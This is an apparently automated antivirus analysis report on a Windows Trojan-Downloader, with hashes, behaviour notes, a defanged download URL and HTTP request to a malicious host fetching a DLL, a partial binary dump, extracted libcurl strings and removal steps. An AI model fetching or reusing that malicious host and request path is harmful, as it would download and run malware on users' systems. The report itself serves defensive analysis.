MD5: 0ead47f1c25287ef3b96e9bc56bebfdd
SHA1: f3781e9068a9c5d7a83c97493e6b01bd68909e00
SHA256: bd0a0c080e17116ef2e51c2847ec15af50d8e9e7e3b6168213908e42f911c22d
SSDeep: 12288:iWbNAxwFFWt3gbZcDFy K/uOTAsYTcz7hkB9cnVix3kLKv:iiIt3IZhYTK7h6U0
Size: 546304 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-11-18 17:18:38
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan-Downloader creates the following process(es):

%original file name%.exe:3708

The Trojan-Downloader injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3708 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

Registry activity

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://reboot-hack.ru/api/storage/inject/MmapApi.dll?_v=205

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /api/storage/inject/MmapApi.dll?_v=. HTTP/1.1

Host: reboot-hack.ru

Accept: */*

HTTP/1.1 200 OK

Date: Tue, 06 Feb 2018 13:18:27 GMT

Server: Apache/2.4.27 (Win64) PHP/5.6.31

Last-Modified: Tue, 06 Feb 2018 13:18:00 GMT

ETag: "42e00-5648b020268fe"

Accept-Ranges: bytes

Content-Length: 273920

Content-Type: application/x-msdownload
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
......S.......Q.......P.....T...............................lvi.......
......&.......&.......Rich............PE..L.....yZ...........!........
..............................................................@.......
..............................<............................p......`
...................................@...............p..................
..........text...y........................... ..`.rdata..,p.......r...
...............@..@.data...t....0......................@....gfids.....
..P......................@..@.tls.........`......................@....
reloc.......p......................@..B...............................
......................................................................
......................................................................
......................................................................
.................................................8...s...h[........Y..
.?.......ho........Y.....V.t$.W.|$. |$.W.t$.V.w........7_^.V.t$...j.j.
....#.....;t$.u.^..L$.;L$.t..D$...9.t....;L$.u....U..V.u.W.}.;}.t...t.
W...3..........._..^].U..QQQ.E...u..u..u..u..u...........].V.t$....f..
.F...............^...V..3.j.P.t$..F......F....-$....^...j..7..........
.u..u.3..F......~...]..^.r..........E..E..;.t.j.SP....#..Sj..M..."....
.j......j..e...........E.3....H..H..M..H..H..H.jnY.H.Q...E...@.L.v%...
..........-...b.....p..#........*...*...^.EM.;._'.ri...R...;..e...
<<< skipped >>>

The Trojan-Downloader connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.gfids

@.tls

.reloc

.JGK`

-n}Kl

.wl!_

88888888888888888

88 8!"#8888

>%u[j

9opu39_tu.Pj

t(<.ut

t.Uh(

D$,<%uf

D$@PSSh

SSSSSh\d

j.Yf;

_tcPVj@

.PjRW

Bv.SCv

-2w}s2w

inappropriate io control operation

not supported

operation canceled

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

address family not supported

broken pipe

function not supported

InitOnceExecuteOnce

Connection #%ld to host %s left intact

Pipe broke: handle %p, url = %s

In state %d with no easy_conn, bail out!

Operation timed out after %ld milliseconds with %I64d out of %I64d bytes received

Operation timed out after %ld milliseconds with %I64d bytes received

Hostname '%s' was found in DNS cache

Internal error removing splay node = %d

Internal error clearing splay node = %d

ignoring failed cookie_init for %s

23[^;

=] =I99[^;

httponly

skipped cookie with bad tailmatch domain: %s

#HttpOnly_

%s cookie %s="%s" for domain %s, path %s, expire %I64d

%s%s%s

# Netscape HTTP Cookie File

# hXXps://curl.haxx.se/docs/http-cookies.html

# This file was generated by libcurl! Edit at your own risk.

# Fatal libcurl error

WARNING: failed to save cookies in %s

security.dll

secur32.dll

Could not resolve %s: %s

init_resolve_thread() failed for %s; %s

getaddrinfo() failed for %s:%d; %s

%s:%d

Hostname %s was found in DNS cache

%5[^:]:%d

Couldn't parse CURLOPT_RESOLVE removal entry '%s'!

%5[^:]:%d:%5s

Couldn't parse CURLOPT_RESOLVE entry '%s'!

Address in '%s' found illegal!

Added %s:%d:%s to DNS cache

Unrecognized parameter value passed via CURLOPT_SSLVERSION

CURL_SSLVERSION_MAX incompatible with CURL_SSLVERSION

CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!

can pipeline

Found bundle for host %s: %p [%s]

Server doesn't support multi-use yet, wait

Server doesn't support multi-use (yet)

Could pipeline, but not asked to!

Pipe is full, skip (%zu)

Multiplexed connection found!

Found pending candidate for reuse and CURLOPT_PIPEWAIT is set

Connected to %s (%s) port %ld (#%ld)

IDN support not present, can't parse Unicode domains

Protocol "%s" not supported or disabled in libcurl

Illegal characters found in URL

Bad URL, colon is first character

Bad URL

127.0.0.1/

Invalid file://hostname/, expected localhost or 127.0.0.1 or none

/:]:%3[/]%[^

<url> malformed

SMTP.

smtp

Unwillingly accepted illegal URL using %d slash%s!

%s://%s%s

Rebuilt URL to: %s

Please URL encode %% as %%, see RFC 6874.

http_proxy

https

http:

Unsupported proxy scheme for '%s'

Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support.

No valid port number in proxy string (%s)

[%*45[0123456789abcdefABCDEF:.]%c

;type=%c

%s://%s%s%s:%hu%s%s%s

Port number out of range

Port number ended with '%c'

Couldn't find host %s in the _netrc file; using defaults

PTF@example.com

No valid port number in connect to host string (%s)

Connecting to hostname: %s

Connecting to port: %d

Couldn't resolve host '%s'

Couldn't resolve proxy '%s'

%s://%s

Found connection %ld, with requests in the pipe (%zu)

Re-using existing connection! (#%ld) with %s %s

No more connections allowed to host: %d

User-Agent: %s

Send failure: %s

Recv failure: %s

Write callback asked for PAUSE when not supported!

[%s %s %s]

Failed to set SO_KEEPALIVE on fd %d

Failed to set SIO_KEEPALIVE_VALS on fd %d: %d

Couldn't bind to interface '%s'

Local Interface %s is ip %s using address family %i

Name '%s' family %i resolved to '%s' family %i

Couldn't bind to '%s'

getsockname() failed with errno %d: %s

Local port: %hu

Bind to local port %hu failed, trying next

bind failed with errno %d: %s

getpeername() failed with errno %d: %s

ssrem inet_ntop() failed with errno %d: %s

ssloc inet_ntop() failed with errno %d: %s

connect to %s port %ld failed: %s

Failed to connect to %s port %ld: %s

Could not set TCP_NODELAY: %s

TCP_NODELAY set

sa_addr inet_ntop() failed with errno %d: %s

Trying %s...

Immediate connect fail for %s: %s

ftps

smtps

tftp

7.54.0

libcurl/7.54.0

operation aborted by callback

Read callback asked for PAUSE when not supported!

seek callback returned error %d

the ioctl callback returned %d

ioctl callback returned error %d

Rewinding stream by : %zd bytes on url %s (zero-length body)

Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)

HTTP server doesn't seem to support byte ranges. Cannot resume.

Simulate a HTTP 304 response!

%s in chunked-encoding

Rewinding stream by : %zu bytes on url %s (size = %I64d, maxdownload = %I64d, bytecount = %I64d, nread = %zd)

Excess found in a non pipelined read: excess = %zu, size = %I64d, maxdownload = %I64d, bytecount = %I64d

No URL set!

%%x

[^?&/:]://%c

Issue another request to this URL: '%s'

Disables POST, goes with %s

HTTPS

%s:%s

%sAuthorization: Basic %s

The requested URL returned error: %d

%s auth using %s with user '%s'

%s, d %s M d:d:d GMT

If-Modified-Since: %s

If-Unmodified-Since: %s

Last-Modified: %s

Referer: %s

Accept-Encoding: %s

Chunky upload is not supported by HTTP 1.0

Host: %s%s%s

Host: %s%s%s:%hu

PTF://

Range: bytes=%s

Content-Range: bytes %s%I64d/%I64d

Content-Range: bytes %s/%I64d

PTF://%s:%s@%s

%s HTTP/%s

%s%s%s%s%s%s%s%s%s%s%s

%s%s=%s

Internal HTTP POST error!

Content-Type: application/x-www-form-urlencoded

Failed sending HTTP POST request

Failed sending HTTP request

HTTP/

Avoided giant realloc for header (max is %d)!

The requested URL returned error: %s

Connection closure while negotiating auth (HTTP 1.0?)

HTTP error before end of send, keep sending

HTTP error before end of send, stop sending

HTTP/%d.%d %d

HTTP/2 %d

Lying server, not serving HTTP/2

HTTP =

RTSP/%d.%d =

HTTP 1.0, assume close after body

HTTP/1.0 proxy connection set to keep alive!

HTTP/1.1 proxy connection set close!

HTTP/1.0 connection set to keep alive!

%ld%s

--:--:--

%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s

@Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds

Conn: %ld (%p) Receive pipe weight: (%I64d/%zu), penalized: %s

Site %s:%d is pipeline blacklisted

Server %s is blacklisted

d:d:d%n

d:d%n

0123456789

Unsupported protocol

URL using bad/illegal format or missing URL

A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.

FTP: The server failed to connect to data port

FTP: Accepting server connect has timed out

FTP: The server did not accept the PRET command.

FTP: unknown PASS reply

FTP: unknown PASV reply

FTP: unknown 227 response format

FTP: can't figure out the host in the PASV response

Error in the HTTP2 framing layer

FTP: couldn't set file type

FTP: couldn't retrieve (RETR failed) the specified file

HTTP response code said error

FTP: command PORT failed

FTP: command REST failed

Operation was aborted by an application callback

A libcurl function was given a bad argument

An unknown option was passed in to libcurl

SSL peer certificate or SSH remote key was not OK

Problem with the local SSL certificate

Peer certificate cannot be authenticated with given CA certificates

Problem with the SSL CA cert (path? access rights?)

Unrecognized or bad HTTP Content or Transfer-Encoding

Invalid LDAP URL

Issuer check against peer certificate failed

Login denied

TFTP: File Not Found

TFTP: Access Violation

TFTP: Illegal operation

TFTP: Unknown transfer ID

TFTP: No such user

Caller must register CURLOPT_CONV_ callback options

Error in the SSH layer

Unable to parse FTP file list

SSL public key does not match pinned public key

SSL server certificate status verification FAILED

Stream error in the HTTP/2 framing layer

Protocol option is unsupported

Protocol is unsupported

Socket is unsupported

Operation not supported

Address family not supported

Protocol family not supported

Winsock version not supported

Unknown error %d (%#x)

SEC_E_CERT_EXPIRED

SEC_E_CERT_UNKNOWN

SEC_E_CERT_WRONG_USAGE

SEC_E_KDC_CERT_EXPIRED

SEC_E_KDC_CERT_REVOKED

SEC_E_NO_KERB_KEY

SEC_E_NO_S4U_PROT_SUPPORT

SEC_E_QOP_NOT_SUPPORTED

SEC_E_SMARTCARD_CERT_EXPIRED

SEC_E_SMARTCARD_CERT_REVOKED

SEC_E_STRONG_CRYPTO_NOT_SUPPORTED

SEC_E_UNSUPPORTED_FUNCTION

SEC_E_UNSUPPORTED_PREAUTH

SEC_E_ILLEGAL_MESSAGE (0xX) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.

%s (0xX)

%s - %s

%d.%d.%d.%d

Schannel: TLS 1.3 is not yet supported

schannel: SSL/TLS connection with %s port %hu (step 1/3)

schannel: incremented credential handle refcount = %d

schannel: disabled server certificate revocation checks

schannel: checking server certificate revocation

schannel: verifyhost setting prevents Schannel from comparing the supplied target name with the subject names in server certificates.

Unrecognized parameter passed via CURLOPT_SSLVERSION

schannel: SNI or certificate check failed: %s

schannel: AcquireCredentialsHandle failed: %s

schannel: using IP address, SNI is not supported by OS.

http/1.1

schannel: ALPN, offering %s

schannel: initial InitializeSecurityContext failed: %s

schannel: SSL/TLS connection with %s port %hu (step 2/3)

schannel: a client certificate has been requested

schannel: next InitializeSecurityContext failed: %s

schannel: SSL/TLS connection with %s port %hu (step 3/3)

schannel: failed to retrieve remote cert context

select/poll on SSL/TLS socket, errno: %d

select/poll on SSL socket, errno: %d

schannel: Curl_read_plain returned CURLE_AGAIN

schannel: Curl_read_plain returned CURLE_RECV_ERROR

schannel: Curl_read_plain returned error %d

schannel: failed to read data from server: %s

schannel: shutting down SSL/TLS connection with %s port %hu

schannel: ApplyControlToken failure: %s

schannel: failed to send close msg: %s (bytes written: %zd)

%c%c==

%c%c%c=

%c%c%c%c

Refusing to issue an RTSP request [%s] without a session ID.

Transport:

Transport: %s

Refusing to issue an RTSP SETUP without a Transport: header.

Range: %s

%s %s RTSP/1.0

Session: %s

%s%s%s%s%s%s%s%s

Unable to read the CSeq header: [%s]

Got RTSP Session ID Line [%s], but wanted ID [%s]

curl

LOGIN %s %s

AUTHENTICATE %s %s

AUTHENTICATE %s

No known authentication mechanisms supported!

LIST "%s" *

SELECT %s

FETCH %s BODY[%s]<%s>

FETCH %s BODY[%s]

APPEND %s (\Seen) {%I64d}

SEARCH %s

LOGINDISABLED

STARTTLS not supported.

Access denied. %c

%cd

%s %s

USER %s

APOP %s %s

AUTH %s %s

AUTH %s

STLS not supported.

Authentication failed: %d

PASS %s

SMTP

SMTPS

EHLO %s

HELO %s

MAIL FROM:%s

MAIL FROM:%s AUTH=%s

MAIL FROM:%s AUTH=%s SIZE=%s

MAIL FROM:%s SIZE=%s

RCPT TO:%s

RCPT TO:<%s>

Got unexpected smtp-server response: %d

STARTTLS denied, code %d

Remote access denied: %d

Command failed: %d

MAIL failed: %d

RCPT failed: %d

DATA failed: %d

PORT

FTPS

Preparing for accepting server on data port

FTP response timeout

FTP response aborted due to select/poll error: %d

CWD %s

getsockname() failed: %s

failed to resolve the address provided to PORT: %s

socket failure: %s

bind(port=%hu) on non-local address failed: %s

bind(port=%hu) failed: %s

bind() failed, we ran out of ports!

%s |%d|%s|%hu|

Failure sending EPRT command: %s

,%d,%d

Failure sending PORT command: %s

Connect data stream passively

PRET %s

PRET STOR %s

PRET RETR %s

REST %d

SIZE %s

MDTM %s

APPE %s

STOR %s

RETR %s

%c%c%c%u%c

Illegal port number in EPSV reply

%d,%d,%d,%d,%d,%d

Skip %d.%d.%d.%d for data connection, re-use %s instead

Bad PASV/EPSV response: d

Can't resolve proxy host %s:%hu

Can't resolve new host %s:%hu

Failed to do PORT

dddddd

ddd d:d:d GMT

Last-Modified: %s, d %s M d:d:d GMT

unsupported MDTM reply format

Got a d response code instead of the assumed 200

ftp server doesn't support SIZE

Failed FTP upload: 

RETR response: d

PBSZ %d

ACCT %s

Access denied: d

ACCT rejected by server: d

Got a d ftp-server response when 220 was expected

unsupported parameter to CURLOPT_FTPSSLAUTH: %d

PROT %c

Entry path is '%s'

QUOT command failed with d

MKD %s

Failed to MKD dir: d

PRET command not accepted: d

Remembering we are in dir "%s"

Failure sending ABOR command: %s

server did not report OK, got %d

QUOT string not accepted: %s

TYPE %c

Connecting to %s (%s) port %d

ftp_perform ends with SECONDARY: %d

Wildcard - START of "%s"

Wildcard - "%s" skipped by user

Failure sending QUIT command: %s

Uploading to a URL without a file name!

CLIENT libcurl 7.54.0

MATCH %s %s %s

DEFINE %s %s

WSAStartup failed (%d)

insufficient winsock version to support telnet

%s IAC %s

%s IAC %d

%s %s %s

%s %s %d

%s %d %d

Sending data failed (%d)

%s IAC SB

%s (unsupported)

%d (unknown)

USER,%s

7[^= ]%*[ =]%5s

Syntax error in telnet option: %s

Unknown telnet option %s

%c%c%c%c%s%c%c

7[^,],7s

%c%s%c%s

WS2_32.DLL

failed to load WS2_32.DLL (%d)

failed to find WSACreateEvent function (%d)

failed to find WSACloseEvent function (%d)

failed to find WSAEventSelect function (%d)

failed to find WSAEnumNetworkEvents function (%d)

WSACreateEvent failed (%d)

WSAEnumNetworkEvents failed (%d)

WSACloseEvent failed (%d)

FreeLibrary(wsock2) failed (%d)

TFTP

set timeouts for state %d; Total %ld, retry %d maxtry %d

got option=(%s) value=(%s)

blksize is larger than max supported

%s (%d)

blksize is smaller than min supported

%s (%ld)

%s (%d) %s (%d)

invalid tsize -:%s:- value in OACK packet

%s%c%s%c

tftp_send_first: internal error

Received last DATA packet block %d again.

Received unexpected DATA packet block %d, expecting block %d

Timeout waiting for block %d ACK. Retries = %d

tftp_rx: internal error

Received ACK for block %d, expecting %d

tftp_tx: giving up waiting for block %d ack

tftp_tx: internal error, event: %i

TFTP finished

bind() failed; %s

TFTP response timeout

LDAP local: LDAP Vendor = %s ; LDAP Version = %d

LDAP local: %s

LDAP local: trying to establish %s connection

LDAP local: Cannot connect to %s:%ld

LDAP local: ldap_simple_bind_s %s

LDAP remote: %s

There are more than %d entries

Couldn't open file %s

Can't open %s for writing

Can't get the size of %s

login

password

%sAuthorization: Digest %s

%sAuthorization: NTLM %s

SOCKS4%s: connecting to HTTP proxy %s port %d

SOCKS4 communication to %s:%d

SOCKS4 connect to IPv4 %s (locally resolved)

SOCKS4 connection to %s not supported

Failed to resolve "%s" for SOCKS4 connect.

SOCKS4%s request granted.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.

SOCKS5: connecting to HTTP proxy %s port %d

SOCKS5 communication to %s:%d

User was rejected by the SOCKS5 server (%d %d).

No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)

SOCKS5 connect to IPv4 %s (locally resolved)

SOCKS5 connection to %s not supported

Failed to resolve "%s" for SOCKS5 connect.

Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)

Can't complete SOCKS5 connection to %s:%d. (%d)

Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)

Establish HTTP proxy tunnel to %s:%hu

%s:%hu

%s%s%s:%hu

Host: %s

CONNECT %s HTTP/%s

%s%s%s%s

Ignoring Content-Length in CONNECT d response

Ignoring Transfer-Encoding in CONNECT d response

HTTP/1.%d %d

TUNNEL_STATE switched to: %d

Received HTTP code %d from proxy after CONNECT

.jpeg

.html

; filename="%s"

%s; boundary=%s

Content-Type: multipart/mixed; boundary=%s

Content-Type: %s

couldn't open file "%s"

--%s--

------------------------xx

NTLM handshake failure (type-3 message): Status=%x

InitializeSecurityContext failed: %s

%sAuthorization: Negotiate %s

2.5.4.3

2.5.29.17

1.2.840.10040.4.1

1.2.840.10040.4.3

1.2.840.10045.2.1

ecPublicKey

1.2.840.10045.3.0.1

1.2.840.10045.4.1

1.2.840.10046.2.1

1.2.840.113549.1.1.1

1.2.840.113549.1.1.2

1.2.840.113549.1.1.4

1.2.840.113549.1.1.5

1.2.840.113549.1.1.10

1.2.840.113549.1.1.14

1.2.840.113549.1.1.11

1.2.840.113549.1.1.12

1.2.840.113549.1.1.13

1.2.840.113549.2.2

1.2.840.113549.2.5

1.3.14.3.2.26

2.5.4.4

2.5.4.5

2.5.4.6

2.5.4.7

2.5.4.8

2.5.4.9

2.5.4.10

2.5.4.11

2.5.4.12

2.5.4.13

2.5.4.17

2.5.4.41

2.5.4.42

2.5.4.43

2.5.4.44

2.5.4.45

2.5.4.46

2.5.4.65

1.2.840.113549.1.9.1

2.5.4.72

2.5.29.18

2.5.29.19

2.16.840.1.101.3.4.2.4

2.16.840.1.101.3.4.2.1

2.16.840.1.101.3.4.2.2

2.16.840.1.101.3.4.2.3

x:

%s%lx

%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s

%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s

%s: %s

RSA Public Key (%lu bits)

RSA Public Key

dsa(pub_key)

dh(pub_key)

- Subject: %s

Issuer: %s

Serial Number: %s

Signature Algorithm: %s

Start Date: %s

Expire Date: %s

Public Key Algorithm

Public Key Algorithm: %s

Signature: %s

-----BEGIN CERTIFICATE-----

-----END CERTIFICATE-----

Cert

KGS!@#$%server response timeout

LOGIN

Unsupported SASL authentication mechanism

0123456789-

SSPI error: %s failed: %s

rcmd

%s/%s

User was rejected by the SOCKS5 server (%u %u).

Invalid SSPI authentication response type (%u %u).

SOCKS5 server authencticated user %s with GSS-API.

SOCKS5 server supports GSS-API %s data protection.

Invalid SSPI encryption response type (%u %u).

SOCKS5 access with%s protection granted.

%s xxxxxxxxxxxxxxxx

user=%s

auth=Bearer %s

host=%s

port=%ld

operator

operator ""

IND)ind)Visual C   CRT: Not enough memory to complete call to strerror.

Operation not permitted

Inappropriate I/O control operation

Broken pipe

?#%X.y

%S#[k

.text$di

.text$mn

.text$x

.text$yd

.idata$5

.CRT$XCA

.CRT$XCAA

.CRT$XCC

.CRT$XCL

.CRT$XCU

.CRT$XCZ

.CRT$XIA

.CRT$XIAA

.CRT$XIAC

.CRT$XIC

.CRT$XIZ

.CRT$XLA

.CRT$XLZ

.CRT$XPA

.CRT$XPX

.CRT$XPXA

.CRT$XPZ

.CRT$XTA

.CRT$XTZ

.rdata

.rdata$T

.rdata$r

.rdata$sxdata

.rdata$zzzdbg

.rtc$IAA

.rtc$IZZ

.rtc$TAA

.rtc$TZZ

.xdata$x

.idata$2

.idata$3

.idata$4

.idata$6

.data

.data$r

.gfids$x

.gfids$y

.tls$

.tls$ZZZ

KERNEL32.dll

USER32.dll

WS2_32.dll

CertFreeCertificateContext

ADVAPI32.dll

CRYPT32.dll

CryptDestroyKey

CryptImportKey

WLDAP32.dll

GetCPInfo

PeekNamedPipe

GetProcessHeap

.?AU_Crt_new_delete@std@@

libcurl/7.54.0 WinSSL

c:\%original file name%.exe

1'232]2{4

?"?&?*?.?2?6?

5"5&5*5.525

2=3g3

>$>(>,>0>

0 0$0(0,000

8 8$8(8,888

2 2$2(2,202

4 4(444\4

1 1@1`1|1

2 2<2@2`2

4 4@4`4|4

kernel32.dll

MmapApi.dll

mscoree.dll

minkernel\crts\ucrt\inc\corecrt_internal_strtox.h

__crt_strtox::floating_point_value::as_double

__crt_strtox::floating_point_value::as_float

ext-ms-win-ntuser-windowstation-l1-1-0

portuguese-brazilian

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   %original file name%.exe:3708

2. Delete the original Trojan-Downloader file.
   
3. Delete or disinfect the following files created/modified by the Trojan-Downloader:
   

4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.